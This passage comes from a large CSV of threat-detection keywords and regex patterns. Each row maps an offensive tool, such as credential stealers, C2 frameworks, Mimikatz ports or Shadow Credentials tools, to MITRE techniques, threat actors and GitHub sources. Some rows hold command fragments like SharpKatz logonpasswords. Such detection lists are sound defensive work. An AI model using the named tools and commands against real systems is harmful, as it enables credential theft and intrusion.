hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58766" 
"*ShadowSpray-master*",".{0,1000}ShadowSpray\-master.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58767" "*ShadowStealer.zip*",".{0,1000}ShadowStealer\.zip.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","1","N/A","N/A","10","","N/A","","","","58768" "*ShadowUser/scvhost.exe*",".{0,1000}ShadowUser\/scvhost\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","58769" "*Shane.Gilles@tutanota.com*",".{0,1000}Shane\.Gilles\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58770" 
"*share/hiphp.py*",".{0,1000}share\/hiphp\.py.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","58772" "*share_listing/ALL_COMBINED_RESULTS.TXT*",".{0,1000}share_listing\/ALL_COMBINED_RESULTS\.TXT.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","58773" "*ShareAudit is a tool for auditing network share permissions in an Active Directory environment. To get started either create a new project or load an existing project. 
For more information regarding how to audit your network shares*",".{0,1000}ShareAudit\sis\sa\stool\sfor\sauditing\snetwork\sshare\spermissions\sin\san\sActive\sDirectory\senvironment\.\sTo\sget\sstarted\seither\screate\sa\snew\sproject\sor\sload\san\sexisting\sproject\.\sFor\smore\sinformation\sregarding\show\sto\saudit\syour\snetwork\sshares.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58774" "*ShareAudit.v3.0.0.exe*",".{0,1000}ShareAudit\.v3\.0\.0\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58775" "*ShareAudit.v3.0.1.exe*",".{0,1000}ShareAudit\.v3\.0\.1\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58776" "*ShareAudit.v3.0.2.exe*",".{0,1000}ShareAudit\.v3\.0\.2\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58777" "*ShareAudit-master.zip*",".{0,1000}ShareAudit\-master\.zip.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active 
Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58778" "*shareenum.py*",".{0,1000}shareenum\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","58779" "*shareenumeration*",".{0,1000}shareenumeration.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","58780" "*SharepointExploiter.ps1*",".{0,1000}SharepointExploiter\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","58781" "*SharepointSiteExploiter.ps1*",".{0,1000}SharepointSiteExploiter\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","58782" "*Shares/cme_spider_plus*",".{0,1000}Shares\/cme_spider_plus.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58783" "*Shares/finduncshar_*.txt*",".{0,1000}Shares\/finduncshar_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58784" "*--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items*decrypted_cookie*",".{0,1000}\-\-Sharing\-this\-will\-allow\-someone\-to\-log\-in\-as\-you\-and\-to\-steal\-your\-ROBUX\-and\-items.{0,1000}decrypted_cookie.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP 
Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","58785" "*sharp ADCollector*",".{0,1000}sharp\sADCollector.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58787" "*sharp ADSearch*",".{0,1000}sharp\sADSearch.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58788" "*sharp BetterSafetyKatz*",".{0,1000}sharp\sBetterSafetyKatz.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58789" "*sharp init download/update SharpCollection tools*",".{0,1000}sharp\sinit\s\sdownload\/update\sSharpCollection\stools.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58790" "*sharp InveighZero*",".{0,1000}sharp\sInveighZero.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 
- T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58791" "*sharp SharpAllowedToAct*",".{0,1000}sharp\sSharpAllowedToAct.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58792" "*sharp SharpAppLocker*",".{0,1000}sharp\sSharpAppLocker.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58793" "*sharp SharpChisel*",".{0,1000}sharp\sSharpChisel.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58794" "*sharp SharpChromium*",".{0,1000}sharp\sSharpChromium.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58795" "*sharp SharpCrashEventLog *",".{0,1000}sharp\sSharpCrashEventLog\s.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - 
TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58796" "*sharp SharpKatz --Command logonpasswords*",".{0,1000}sharp\sSharpKatz\s\-\-Command\slogonpasswords.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58797" "*sharp SharpMiniDump*",".{0,1000}sharp\sSharpMiniDump.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58798" "*sharp Sharp-SMBExec *",".{0,1000}sharp\sSharp\-SMBExec\s.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","APT29","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58799" "*sharp SharpSpray*",".{0,1000}sharp\sSharpSpray.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58800" "*sharp SharpZeroLogon*",".{0,1000}sharp\sSharpZeroLogon.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - 
TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58801" "*sharp StickyNotesExtract*",".{0,1000}sharp\sStickyNotesExtract.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58802" "*sharp winPEAS*",".{0,1000}sharp\swinPEAS.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58803" "*sharp_collection.insert(*",".{0,1000}sharp_collection\.insert\(.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58804" "*Sharp_v4_x64*.bin*",".{0,1000}Sharp_v4_x64.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58805" "*Sharp_v4_x86*.bin*",".{0,1000}Sharp_v4_x86.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58806" "*sharpadidnsdump.*",".{0,1000}sharpadidnsdump\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58807" "*SharpAdidnsdumpManager*",".{0,1000}SharpAdidnsdumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58808" "*SharpAdidnsdumpMenu*",".{0,1000}SharpAdidnsdumpMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed 
in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58809" "*SharpADWS 1.0.0-beta - Copyright*",".{0,1000}SharpADWS\s1\.0\.0\-beta\s\-\sCopyright.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","58810" "*SharpADWS.exe*",".{0,1000}SharpADWS\.exe.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","58811" "*SharpAllowedToAct.exe*",".{0,1000}SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58812" "*SharpAltSecIds add*",".{0,1000}SharpAltSecIds\sadd.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58813" "*SharpAltSecIds by @bugch3ck*",".{0,1000}SharpAltSecIds\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. 
This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#content","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58814" "*SharpAltSecIds command*",".{0,1000}SharpAltSecIds\scommand.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58815" "*SharpAltSecIds l /target:*",".{0,1000}SharpAltSecIds\sl\s\/target\:.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58816" "*SharpAltSecIds list*",".{0,1000}SharpAltSecIds\slist.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. 
This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58817" "*SharpAltSecIds r /target:*",".{0,1000}SharpAltSecIds\sr\s\/target\:.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58818" "*SharpAltSecIds remove*",".{0,1000}SharpAltSecIds\sremove.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. 
This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58819" "*sharpapplocker*",".{0,1000}sharpapplocker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58820" "*SharpAppLocker.exe*",".{0,1000}SharpAppLocker\.exe.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","1","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","58821" "*SharpAppLocker.exe*",".{0,1000}SharpAppLocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58822" "*SharpAVKB.Cmd*",".{0,1000}SharpAVKB\.Cmd.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","58823" "*SharpAVKB.exe -AV*",".{0,1000}SharpAVKB\.exe\s\-AV.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - 